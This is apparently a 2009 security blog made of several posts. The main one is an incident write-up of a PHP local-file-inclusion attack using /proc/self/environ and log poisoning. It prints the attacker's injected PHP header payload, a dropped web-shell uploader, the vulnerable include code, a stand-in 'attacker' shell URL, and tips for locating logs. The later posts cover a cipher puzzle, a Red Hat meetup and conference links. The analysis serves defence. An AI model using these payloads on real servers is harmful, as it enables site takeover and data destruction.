Having encountered the last LFI attack on my client, I researched a little more on ways that LFI can be used to exploit different scenarios. There is one other main adaptation of the concept which has been published by various sources, including milw0rm - log poisoning.

It would seem that Apache access logs as well as error logs can be injected with code such that when the log file is accessed, the code is parsed. Which means to say, the previous exploit that was used -

92.241.137.238 - - [07/Mar/2009:23:36:02 +0000]
"GET /?p=../../../../../../../../../../proc/self/environ%00 HTTP/1.1"
200 15491 "-"
"<? $o=fopen(\"testa.php\",\"a+\");
fwrite($o,\"stefo je king\"); fclose($o); ?>"

was exploitable in two different ways. The first way was described in the previous post. The second way would be that instead of writing “stefo je king”, if an actual PHP script like

$o = fopen("shell.php","w");
fwrite($o,"http://attacker/shell.txt");fclose($o);

was used, the the attacker could have tried to used the traversal attack to access a log file and get the shell script on the server again.

Another interesting piece of information I found was - let’s say Apache was installed in a non-default location and logs were therefore placed in a folder that was unknown to you. You have tried the default list of folders to search for and are out of ideas. Of course, the site is vulnerable to LFI. You could inject a piece of code to read from -

/proc/self/cmdline

Like /proc/self/environ shows the current environment status, /proc/self/cmdline shows the command line argument that spawned the process calling it. For example, if you’re calling it from shell, you’ll get “-bash” as the response. If Apache calls it, you’ll get the full path where Apache is installed. And you will then know where to find the logs.

As rhican rightly asserts, “good hosters should block access to /proc imho there’s tons of stuff a php script as no business there”.

Credits to Christian Busch for helping me out on this one.

Late last night, I was approached with an interesting case of a denial of service attack. And I mean it – no one was able to access the service – because all files were deleted. The client informed me that remote shell scripts were able to find their way onto the server.

The first step was obviously to restore the files on the server, which was trivial given that WHM made daily backups for him. Then the search for the shell scripts began. I identified a couple of them –

File found - backup.php (2463) - 03/06/2009
File found - shelld.php (23124) - 03/08/2009
File found - .php (96420) - 03/07/2009
File found - testa.php (85) - 03/08/2009
File found - test.php (38868) - 02/05/2009
File found - c.php (597944) - 02/25/2009

The files are zipped and downloadable. Be sure to manage your AV exclusions.

The file that requires some attention is testa.php.

testa.php

<? $aa = $_POST["shell"];
$o = fopen("shelld.php","wb");fwrite($o,$aa);fclose($o); ?>

I shall cut the crap and go straight to the logs. You may download a copy of all the logs here. But let’s take a look at a sample line –

92.241.137.238 - - [07/Mar/2009:23:36:02 +0000]
"GET /?p=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1"
200 15491 "-"
"<? $o=fopen(\"testa.php\",\"a+\"); fwrite($o,\"stefo je king\"); fclose($o); ?>"

A directory traversal attack! I haven’t seen one like that in years!  But this one is smart. For those who do not understand what that line in the logs mean - a user using the IP address 92.241.137.238 visited the page

/?p=../../../../../../../../../../../../../proc/self/environ%00

with the browser headers as PHP code.

Let’s take a look at the output of the GET URL –

Smart, eh? Click to enlarge.

It seems like the browser and PHP information are output.

Looking at some relevant PHP code –

 <? // Change This
        $p = stripslashes($_REQUEST['p']);
    if(file_exists(CWD.'/'.$p.'.php')){
        include(CWD.'/'.$p.'.php');
    }else{
        include(CWD.'/'.$_SESSION['lan'].'/'.$p.'.php');
}?>

“This” certainly needs to be changed.

Let’s look at the query executed again. The null byte is used to ignore the “.php” extension and only include /proc/self/environ

What’s even smarter is this – because browser information is include’d, PHP code was used as the browser headers and was therefore included and parsed.

If you look further down the logs, you will realize that the C99 shell is also included from a certain URL –

Shells. Sea Shells. Remote Shells. Evil Shells.

Looks like someone set up a site just for this purpose.

There are other things probably worth mentioning, but I guess not this time. The things to take away would be –

1. Always sanitize parameters passed to functions like require’s, require_once’s, include’s, include_once’s, fopen’s, file_get_contents’, etc to prevent directory traversal
2. Using /proc/self/environ as an attack vector to execute PHP code remotely that is hardly ever published. I hope that this article provided you with some insights.
3. And to all the security researchers out there – You can now stop using the cat /etc/passwd POC and start using something like this. =)

Have fun and take care

The CCC has published a wiki article that advises its attendees on various practices to help them not get “hacked” during the congress itself. After all, security conferences like these are like warzones.

The article touches on various aspects of security, including software and physical security. It also has a brief roundup on how to secure each system. Of course, there’s nothing too detailed and it might even be missing a couple of possible attack vectors,  but the general idea is there.

Check it out.

Like last year’s challenge, this year’s challenge (imho) is another lame attempt at publicity.

The cipher is presented in a SWF -

FWTDLCSWV. YD
NSLMIJFWEJFD GSW SL
NIJNQBLM FOBV EJFDVF
DLNIGTFBSL. KBVBF
YYY.AHB.MSK/NSCDC.OFZ
FS EDF WV QLSY SA
GSWI VWNNDVV.

It’s a simple substitution cipher that gives -

stupendous. we
congratulate you on
cracking this latest
encryption. visit
www.fbi.gov/coded.htm
to let us know of
your success.

Not exactly “latest encryption”.

It is pretty late for a mention of the last SSMG meetup, which occurred on 18th December at Red Hat Asia-Pacific, but I’m sharing this anyway. Eugene Teo spoke generally about the process of the handling of bug reports at Red Hat. A short biography of Eugene -

Eugene Teo works for the Red Hat Security Team (only one in AP). He focuses on Linux kernel security. He has been an active member of the Linux and open source community in Singapore for over a decade, having held different portfolios within the Linux Users’ Group of Singapore. Eugene has spoken at numerous conferences, including the Red Hat Summit, GNOME.Asia, and Linux Conference Australia.

Follow ups by Eugene through email

Hi all,

For those who attended my talk, thanks a lot. I hope you find it useful.

Here are a couple of notes that you will find useful:

- Red Hat published a risk report on the three years of Red Hat

Enterprise Linux 4. Feel free to read it at:

http://www.redhatmagazine.com/2008/02/26/risk-report-three-years-of-red-hat-enterprise-linux-4/

- How do you find out if Red Hat have fixed a particular named issue?

Most public security issues that affect Red Hat will already have an

assigned CVE number[1]. The CVE number will be formatted as

CVE-YYYY-XXXX where YYYY is a year, and XXXX is a 4 digit integer.

Use the Red Hat Network to see if we have issued updates that correct

this issue:

Example: http://rhn.redhat.com/errata/CVE-2008-3526.html

It is possible that an issue affects one of our products, but has not

had an update released yet. We track all known issues in bugzilla, and

place the CVE id in the summary line. Doing a bugzilla search for a

given CVE id should reveal if we are working on it.

Example: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-4554

If you do not see anything there perhaps this is an issue that for

some reason does not affect Red Hat. If so, we will have given an

official vendor statement to the National Vulnerability Database.

Example: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4618

[1] CVE stands for Common Vulnerabilities and Exposures (CVE). Check

out: http://cve.mitre.org/

Thanks, Eugene

So Bit9 has released a paper on the top vulnerable apps in 2008. Firefox tops the list with 10 vulnerabilities that “allows hackers to gain control of your computer and steal passwords”.

Take a look at the paper here - http://www.bit9.com/files/Vulnerable_Apps_DEC_08.pdf

(Cross-posted on HackQuest, TheBlackSheep and Net-Force)

Every once in a while, you’ll find that an upgraded version of a software isn’t the best version of it to have. In PHP 5.2.7, magic_quotes_gpc is permanently disabled, not that you should be relying on it anyway.

The fix for this was alreaday commited to the PHP CVS so grab a snapshot if you’d like. Otherwise, PHP 5.2.8 will be released next week.

No, the above image does not have anything to do with what I’m going to blog about. I just find it creative and amusing.

Well anyways, MetaSploit Framework 3.2 is released. Almost all modules have IPv6 support now and there’s a bunch of other cool new updates. Be sure to check it out!

As a side note, Onn Chee has pointed out in the security meetup mailing list, a presentation by Tim Bass on the insecurity of proxy caches. See his blog post and his presentation (presented at OWASP AppSec Asia 2008). It’s a good read.

Lately I’ve been working (somewhat) on a little side project that’s got nothing to do with security - TwitImage

Basically what TwitImage does is to retrieve your latest Twitter update every hour and display it on an image on a background. You can login to TwitImage using your Twitter username and password (courtesy of Twitter’s REST API) to modify how you want your TwitImage to look like. You are free to change fonts, font size, font colour, text alignment and save them to be generated that way each time.

Yes, I know the site looks ugly for now. :)

Hope you guys enjoy TwitImage

A complementary desktop application Twitella (made with Flex / AIR) was created by Chalit. It rides on the REST API as well and provides all the functionalities that Twitter provides, allowing you to post status updates, direct messages and all. You don’t have to put up with all of Twitter’s timeouts either.

Enjoy these apps

Virus Bulletin 2008 Slides -
http://www.virusbtn.com/conference/vb2008/slides/index

ToorCon X Presentations -
http://security4all.blogspot.com/2008/11/toorcon-x-presentations-online-plus.html

OWASP 2008 Videos -
http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference

HITB Slides -
http://conference.hitb.org/hitbsecconf2008kl/materials/